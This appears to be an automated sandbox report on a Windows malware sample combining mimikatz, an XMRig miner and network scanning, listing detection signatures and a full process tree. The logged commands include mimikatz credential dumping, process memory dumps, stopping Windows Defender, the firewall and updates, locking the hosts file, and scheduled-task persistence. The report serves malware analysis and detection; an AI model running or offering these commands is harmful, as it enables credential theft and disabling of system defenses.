Overview

overview

10

Static

static

10

2024-10-15...tz.exe

windows7-x64

10

2024-10-15...tz.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-10-2024 09:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2024-10-15_49b065bf837bdec4f7f9380143d66384_hacktools_icedid_mimikatz.exe

  • Size

    9.9MB

  • MD5

    49b065bf837bdec4f7f9380143d66384

  • SHA1

    6ec987599cc4a528162da1bf48e65b29bebca33e

  • SHA256

    b074d797ea90a9f52517e96b7d4dc6039db2091b54bda7e6ba26e5e34766f715

  • SHA512

    6e86a230c0235ae7e376a9f5bb1e559ce7924982ec6cf8f2131605ab7bf892a0cda8b9c6c57f06a3adaffb4dd456e91e71b0b73e0b2bc8ad0603b8bdaf622065

  • SSDEEP

    196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Score
10/10
mimikatzxmrigcredential_accessdiscoveryevasionexecutionminerpersistenceprivilege_escalationupx

Malware Config

Signatures

  • Disables service(s) 3 TTPs
    evasionexecution
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

    mimikatz
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Contacts a large (19111) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

    credential_access
  • XMRig Miner payload 10 IoCs
    miner
  • mimikatz is an open source tool to dump credentials on Windows 6 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
    persistence
  • Modifies Windows Firewall 2 TTPs 2 IoCs
    evasion
  • Executes dropped EXE 28 IoCs
  • Loads dropped DLL 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

    discovery
  • Creates a Windows Service
    persistence
  • Drops file in System32 directory 18 IoCs
  • UPX packed file 34 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • NSIS installer 3 IoCs
    installer
  • Modifies data under HKEY_USERS 43 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:2212
      • C:\Windows\TEMP\lbkubiujb\ikrhah.exe
        "C:\Windows\TEMP\lbkubiujb\ikrhah.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4580
    • C:\Users\Admin\AppData\Local\Temp\2024-10-15_49b065bf837bdec4f7f9380143d66384_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-10-15_49b065bf837bdec4f7f9380143d66384_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3004
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\mrkytpbw\qimkcel.exe
        2⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:4388
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3928
        • C:\Windows\mrkytpbw\qimkcel.exe
          C:\Windows\mrkytpbw\qimkcel.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:3068
    • C:\Windows\mrkytpbw\qimkcel.exe
      C:\Windows\mrkytpbw\qimkcel.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4356
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1592
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4848
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1032
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1236
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
          3⤵
            PID:1132
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:4724
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2412
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static del all
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:3672
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add policy name=Bastards description=FuckingBastards
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:4660
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add filteraction name=BastardsList action=block
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          PID:4332
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c C:\Windows\gleeqcecb\shhwuwcbk\wpcap.exe /S
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3228
          • C:\Windows\gleeqcecb\shhwuwcbk\wpcap.exe
            C:\Windows\gleeqcecb\shhwuwcbk\wpcap.exe /S
            3⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in System32 directory
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2144
            • C:\Windows\SysWOW64\net.exe
              net stop "Boundary Meter"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:448
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop "Boundary Meter"
                5⤵
                  PID:2632
              • C:\Windows\SysWOW64\net.exe
                net stop "TrueSight Meter"
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1956
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "TrueSight Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:2704
              • C:\Windows\SysWOW64\net.exe
                net stop npf
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4856
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop npf
                  5⤵
                    PID:1920
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:1560
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    5⤵
                      PID:2596
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net start npf
                2⤵
                  PID:4904
                  • C:\Windows\SysWOW64\net.exe
                    net start npf
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:4296
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start npf
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:2816
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net start npf
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:3132
                  • C:\Windows\SysWOW64\net.exe
                    net start npf
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:4564
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start npf
                      4⤵
                        PID:4020
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c C:\Windows\gleeqcecb\shhwuwcbk\uutltfljw.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\gleeqcecb\shhwuwcbk\Scant.txt
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:3412
                    • C:\Windows\gleeqcecb\shhwuwcbk\uutltfljw.exe
                      C:\Windows\gleeqcecb\shhwuwcbk\uutltfljw.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\gleeqcecb\shhwuwcbk\Scant.txt
                      3⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      PID:3004
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c C:\Windows\gleeqcecb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\gleeqcecb\Corporate\log.txt
                    2⤵
                    • Drops file in Windows directory
                    PID:4504
                    • C:\Windows\gleeqcecb\Corporate\vfshost.exe
                      C:\Windows\gleeqcecb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                      3⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2576
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "yrkyuaujk" /ru system /tr "cmd /c C:\Windows\ime\qimkcel.exe"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:4324
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                        PID:5092
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /create /sc minute /mo 1 /tn "yrkyuaujk" /ru system /tr "cmd /c C:\Windows\ime\qimkcel.exe"
                        3⤵
                        • System Location Discovery: System Language Discovery
                        • Scheduled Task/Job: Scheduled Task
                        PID:2880
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tpkkselhl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\mrkytpbw\qimkcel.exe /p everyone:F"
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:5052
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:2644
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /create /sc minute /mo 1 /tn "tpkkselhl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\mrkytpbw\qimkcel.exe /p everyone:F"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:2740
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ichelrzbp" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\lbkubiujb\ikrhah.exe /p everyone:F"
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:1764
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:2100
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /create /sc minute /mo 1 /tn "ichelrzbp" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\lbkubiujb\ikrhah.exe /p everyone:F"
                        3⤵
                        • System Location Discovery: System Language Discovery
                        • Scheduled Task/Job: Scheduled Task
                        PID:64
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:832
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:348
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:3396
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static set policy name=Bastards assign=y
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:2076
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:3384
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:5060
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:3332
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static set policy name=Bastards assign=y
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:2340
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:3460
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:4984
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:3272
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static set policy name=Bastards assign=y
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:408
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net stop SharedAccess
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:1388
                      • C:\Windows\SysWOW64\net.exe
                        net stop SharedAccess
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:228
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop SharedAccess
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:3028
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c netsh firewall set opmode mode=disable
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:3656
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh firewall set opmode mode=disable
                        3⤵
                        • Modifies Windows Firewall
                        • Event Triggered Execution: Netsh Helper DLL
                        PID:3328
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c netsh Advfirewall set allprofiles state off
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:1176
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh Advfirewall set allprofiles state off
                        3⤵
                        • Modifies Windows Firewall
                        • Event Triggered Execution: Netsh Helper DLL
                        PID:4756
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net stop MpsSvc
                      2⤵
                        PID:1856
                        • C:\Windows\SysWOW64\net.exe
                          net stop MpsSvc
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:1896
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop MpsSvc
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:876
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c net stop WinDefend
                        2⤵
                          PID:5092
                          • C:\Windows\SysWOW64\net.exe
                            net stop WinDefend
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:2720
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop WinDefend
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:3932
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c net stop wuauserv
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:4412
                          • C:\Windows\SysWOW64\net.exe
                            net stop wuauserv
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:4436
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop wuauserv
                              4⤵
                                PID:4888
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config MpsSvc start= disabled
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:2632
                            • C:\Windows\SysWOW64\sc.exe
                              sc config MpsSvc start= disabled
                              3⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:1028
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config SharedAccess start= disabled
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:2880
                            • C:\Windows\SysWOW64\sc.exe
                              sc config SharedAccess start= disabled
                              3⤵
                              • Launches sc.exe
                              PID:1840
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config WinDefend start= disabled
                            2⤵
                              PID:5028
                              • C:\Windows\SysWOW64\sc.exe
                                sc config WinDefend start= disabled
                                3⤵
                                • Launches sc.exe
                                PID:1868
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c sc config wuauserv start= disabled
                              2⤵
                                PID:2412
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config wuauserv start= disabled
                                  3⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:4336
                              • C:\Windows\TEMP\xohudmc.exe
                                C:\Windows\TEMP\xohudmc.exe
                                2⤵
                                • Executes dropped EXE
                                • Drops file in System32 directory
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of SetWindowsHookEx
                                PID:5048
                              • C:\Windows\TEMP\gleeqcecb\jiurhmlkh.exe
                                C:\Windows\TEMP\gleeqcecb\jiurhmlkh.exe -accepteula -mp 792 C:\Windows\TEMP\gleeqcecb\792.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5060
                              • C:\Windows\TEMP\gleeqcecb\jiurhmlkh.exe
                                C:\Windows\TEMP\gleeqcecb\jiurhmlkh.exe -accepteula -mp 384 C:\Windows\TEMP\gleeqcecb\384.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4268
                              • C:\Windows\TEMP\gleeqcecb\jiurhmlkh.exe
                                C:\Windows\TEMP\gleeqcecb\jiurhmlkh.exe -accepteula -mp 2212 C:\Windows\TEMP\gleeqcecb\2212.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4368
                              • C:\Windows\TEMP\gleeqcecb\jiurhmlkh.exe
                                C:\Windows\TEMP\gleeqcecb\jiurhmlkh.exe -accepteula -mp 2536 C:\Windows\TEMP\gleeqcecb\2536.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2380
                              • C:\Windows\TEMP\gleeqcecb\jiurhmlkh.exe
                                C:\Windows\TEMP\gleeqcecb\jiurhmlkh.exe -accepteula -mp 2636 C:\Windows\TEMP\gleeqcecb\2636.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3920
                              • C:\Windows\TEMP\gleeqcecb\jiurhmlkh.exe
                                C:\Windows\TEMP\gleeqcecb\jiurhmlkh.exe -accepteula -mp 2984 C:\Windows\TEMP\gleeqcecb\2984.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1628
                              • C:\Windows\TEMP\gleeqcecb\jiurhmlkh.exe
                                C:\Windows\TEMP\gleeqcecb\jiurhmlkh.exe -accepteula -mp 3308 C:\Windows\TEMP\gleeqcecb\3308.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2516
                              • C:\Windows\TEMP\gleeqcecb\jiurhmlkh.exe
                                C:\Windows\TEMP\gleeqcecb\jiurhmlkh.exe -accepteula -mp 3812 C:\Windows\TEMP\gleeqcecb\3812.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4440
                              • C:\Windows\TEMP\gleeqcecb\jiurhmlkh.exe
                                C:\Windows\TEMP\gleeqcecb\jiurhmlkh.exe -accepteula -mp 3912 C:\Windows\TEMP\gleeqcecb\3912.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3140
                              • C:\Windows\TEMP\gleeqcecb\jiurhmlkh.exe
                                C:\Windows\TEMP\gleeqcecb\jiurhmlkh.exe -accepteula -mp 3996 C:\Windows\TEMP\gleeqcecb\3996.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:644
                              • C:\Windows\TEMP\gleeqcecb\jiurhmlkh.exe
                                C:\Windows\TEMP\gleeqcecb\jiurhmlkh.exe -accepteula -mp 4080 C:\Windows\TEMP\gleeqcecb\4080.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1860
                              • C:\Windows\TEMP\gleeqcecb\jiurhmlkh.exe
                                C:\Windows\TEMP\gleeqcecb\jiurhmlkh.exe -accepteula -mp 4068 C:\Windows\TEMP\gleeqcecb\4068.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4064
                              • C:\Windows\TEMP\gleeqcecb\jiurhmlkh.exe
                                C:\Windows\TEMP\gleeqcecb\jiurhmlkh.exe -accepteula -mp 2104 C:\Windows\TEMP\gleeqcecb\2104.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3068
                              • C:\Windows\TEMP\gleeqcecb\jiurhmlkh.exe
                                C:\Windows\TEMP\gleeqcecb\jiurhmlkh.exe -accepteula -mp 1568 C:\Windows\TEMP\gleeqcecb\1568.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2416
                              • C:\Windows\TEMP\gleeqcecb\jiurhmlkh.exe
                                C:\Windows\TEMP\gleeqcecb\jiurhmlkh.exe -accepteula -mp 912 C:\Windows\TEMP\gleeqcecb\912.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1744
                              • C:\Windows\TEMP\gleeqcecb\jiurhmlkh.exe
                                C:\Windows\TEMP\gleeqcecb\jiurhmlkh.exe -accepteula -mp 4352 C:\Windows\TEMP\gleeqcecb\4352.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3572
                              • C:\Windows\TEMP\gleeqcecb\jiurhmlkh.exe
                                C:\Windows\TEMP\gleeqcecb\jiurhmlkh.exe -accepteula -mp 4432 C:\Windows\TEMP\gleeqcecb\4432.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1772
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c C:\Windows\gleeqcecb\shhwuwcbk\scan.bat
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:4136
                                • C:\Windows\gleeqcecb\shhwuwcbk\auljwezhy.exe
                                  auljwezhy.exe TCP 138.199.0.1 138.199.255.255 7001 512 /save
                                  3⤵
                                  • Executes dropped EXE
                                  • Drops file in Windows directory
                                  • System Location Discovery: System Language Discovery
                                  PID:4728
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:5328
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:6072
                                • C:\Windows\SysWOW64\cacls.exe
                                  cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                  3⤵
                                    PID:5828
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                    3⤵
                                      PID:5872
                                    • C:\Windows\SysWOW64\cacls.exe
                                      cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1464
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:5460
                                    • C:\Windows\SysWOW64\cacls.exe
                                      cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3464
                                • C:\Windows\SysWOW64\nspfso.exe
                                  C:\Windows\SysWOW64\nspfso.exe
                                  1⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetWindowsHookEx
                                  PID:4376
                                • C:\Windows\system32\cmd.EXE
                                  C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\lbkubiujb\ikrhah.exe /p everyone:F
                                  1⤵
                                    PID:2816
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                      2⤵
                                        PID:1788
                                      • C:\Windows\system32\cacls.exe
                                        cacls C:\Windows\TEMP\lbkubiujb\ikrhah.exe /p everyone:F
                                        2⤵
                                          PID:3396
                                      • C:\Windows\system32\cmd.EXE
                                        C:\Windows\system32\cmd.EXE /c C:\Windows\ime\qimkcel.exe
                                        1⤵
                                          PID:4012
                                          • C:\Windows\ime\qimkcel.exe
                                            C:\Windows\ime\qimkcel.exe
                                            2⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetWindowsHookEx
                                            PID:2112
                                        • C:\Windows\system32\cmd.EXE
                                          C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\mrkytpbw\qimkcel.exe /p everyone:F
                                          1⤵
